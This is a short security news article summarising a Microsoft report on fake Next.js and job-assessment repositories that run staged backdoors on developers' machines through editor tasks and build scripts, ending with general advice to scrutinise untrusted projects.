Microsoft has uncovered a coordinated campaign that targets software developers through fake repositories pretending to be legitimate Next.js projects and technical assessments. These malicious repositories are designed to blend seamlessly into everyday workflows, making it easy for attackers to execute malicious code without raising suspicion. The campaign uses clever tricks to ensure the backdoor remains hidden while gaining access to valuable developer systems containing source code, secrets, and credentials.

Deceptive Tactics and Delivery Methods

The attackers created repositories that appear legitimate, often following common naming patterns and project structures. In some cases, opening the project in tools like Visual Studio Code automatically triggered malicious tasks embedded in the workspace settings. These tasks run automatically when a folder is trusted or opened, allowing the malicious code to execute without any direct action from the developer.

Other variants rely on build processes or server startup routines to run malicious scripts. For example, launching a development server or initiating a build can trigger the backdoor, giving attackers a foothold within the developer’s environment. These methods are designed to work seamlessly with typical development workflows, making detection difficult.

The malicious repositories retrieve additional JavaScript payloads from remote servers and execute them in memory. This approach reduces traces on disk, making it harder for security tools to detect the malicious activity. The payloads operate in stages, with an initial component identifying the host and executing bootstrap instructions, followed by communication with command-and-control servers for persistence and further actions.

How the Campaign Works and Its Connection to Broader Threats

The campaign appears to be part of a larger cluster of threats that use job-themed lures to attract targets. Microsoft’s telemetry showed that once a developer cloned or opened one of these repositories, the malware could establish persistence and enable additional malicious actions, such as data exfiltration or further payload delivery.

The investigation started when suspicious outbound connections from Node.js processes were detected. These connections led analysts back to the original infection points, which were often disguised as technical assessments or coding tests hosted on platforms like Bitbucket. The repositories used consistent naming conventions and project “families,” making it easier for researchers to identify related malicious code.

The attackers exploited the trust developers place in shared code and open source projects. By embedding malicious tasks in seemingly harmless repositories, they gained access to high-value systems that often contain source code, environment secrets, and access credentials for cloud services or internal networks. This makes the campaign particularly dangerous and effective.

Overall, this campaign highlights the importance of scrutinizing third-party repositories and being cautious when opening projects from untrusted sources. Developers should be aware of the risks and ensure their development environments are properly secured and monitored for suspicious activity.

Inspired by

• https://www.infoworld.com/article/4137197/microsoft-warns-of-job%e2%80%91themed-repo-lures-targeting-developers-with-multi%e2%80%91stage-backdoors-2.html

Sources

• microsoft.com
• csoonline.com
• csoonline.com